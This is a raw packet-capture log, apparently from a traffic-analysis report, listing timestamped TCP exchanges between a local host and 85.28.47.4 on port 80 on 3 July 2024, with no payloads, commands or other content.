                                                                Jul 3, 2024 08:38:16.280905008 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.283143997 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.283204079 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.363351107 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.363373041 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.363388062 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.363431931 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.363435030 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.363459110 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.363470078 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.363472939 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.363486052 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.363614082 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.363784075 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.363797903 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.363815069 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.363828897 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.363831043 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.363842010 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.363852024 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.363856077 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.363899946 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.364145994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.364162922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.364177942 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.364191055 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.364202023 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.364206076 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.364229918 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.364244938 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.364398003 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.364411116 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.364424944 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.364437103 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.364455938 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.364458084 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.364471912 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.364495993 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.364512920 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.364516020 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.364526033 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.364540100 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.364547014 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.364553928 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.364567041 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.364582062 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.364582062 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.364588976 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.364619970 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.365339041 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.365356922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.365370989 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.365384102 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.365387917 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.365398884 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.365411997 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.365413904 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.365423918 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.365432024 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.365447044 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.365453005 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.365459919 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.365472078 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.365485907 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.365492105 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.365499973 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.365503073 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.365513086 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.365528107 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.365528107 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.365551949 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.365569115 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.366244078 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.366260052 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.366272926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.366286993 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.366300106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.366312981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.366318941 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.366326094 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.366338015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.366350889 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.366364956 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.366365910 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.366379023 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.366391897 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.366393089 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.366404057 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.366417885 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.366432905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.366440058 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.366462946 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.366487026 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.367053986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.367069006 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.367083073 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.367096901 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.367110014 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.367141962 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.367181063 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.367223024 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.367259979 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.367273092 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.367304087 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.367314100 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.367333889 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.367356062 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.367410898 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.367425919 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.367454052 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.367475986 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.367516994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.367530107 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.367551088 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.367566109 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.367573023 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.367613077 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.367934942 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.367949963 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.367963076 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.367978096 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.367985964 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.367990971 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.368005037 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.368015051 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.368017912 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.368031979 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.368046999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.368051052 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.368072987 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.368104935 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.368491888 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.368510008 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.368522882 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.368536949 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.368551016 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.368551970 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.368563890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.368585110 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.368624926 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.368766069 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.368781090 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.368802071 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.368804932 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.368815899 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.368829012 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.368829012 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.368843079 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.368856907 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.368860006 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.368879080 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.368891954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.368906975 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.368921041 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.368944883 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.442650080 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.442670107 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.442683935 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.442739964 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.442754030 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.442933083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.442934990 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.442934990 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.442949057 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.442974091 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.443016052 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.443033934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.443048954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.443078995 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.443101883 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.443248987 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.443260908 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.443274975 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.443289042 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.443301916 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.443301916 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.443315983 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.443341970 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.443366051 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.443504095 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.443541050 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.443548918 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.443583965 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.443639040 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.443684101 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.450155973 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.450187922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.450205088 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.450217962 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.450229883 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.450242043 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.450256109 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.450304031 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.450340033 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.450395107 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.450408936 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.450417995 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.450422049 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.450436115 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.450448036 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.450475931 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.450650930 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.450663090 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.450673103 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.450683117 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.450692892 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.450702906 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.450983047 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.450993061 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.451001883 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.451011896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.451023102 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.451033115 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.451044083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.451462984 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.451474905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.451483965 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.451494932 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.451504946 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.451514959 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.451524019 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.451539993 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.451550007 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.451560020 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.451570034 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.451581001 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.451591015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452158928 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452169895 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452179909 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452189922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452199936 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452209949 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452219963 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452692032 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452702999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452713013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452723026 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452733040 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452743053 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452753067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452764034 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452773094 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452783108 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452788115 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452799082 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452807903 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452819109 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452830076 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.452841997 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.453502893 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.453512907 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.453522921 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.453532934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.453542948 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.453553915 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.454152107 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.454161882 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.454261065 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.454308987 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.454322100 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.454498053 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.454509020 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.454519987 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.454530001 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.454797029 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.454808950 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.455019951 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.455034018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.455046892 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.455059052 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.455071926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.455086946 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.455101013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.455193996 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.455236912 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.455243111 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.455279112 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.455449104 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.455462933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.455476046 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.455487967 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.455497026 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.455501080 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.455513954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.455521107 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.455527067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.455539942 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.455553055 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.455562115 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.455565929 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.455579996 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.455590963 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.455594063 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.455611944 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.455643892 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.456135035 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.456150055 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.456165075 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.456177950 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.456212997 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.456212997 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.456226110 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.529829025 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.529846907 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.529876947 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.529890060 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.529902935 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.529915094 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.530009985 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.530082941 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.530100107 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.530112028 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.530132055 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.530143023 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.530144930 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.530160904 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.530184984 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.530251980 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.530391932 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.530402899 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.530416965 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.530430079 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.530442953 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.530482054 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.540949106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.540977955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.540991068 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.541055918 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.541093111 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.541121960 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.541135073 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.541147947 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.541162014 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.541168928 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.541205883 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.541407108 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.541420937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.541450977 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.541485071 CEST4971080192.168.2.685.28.47.4
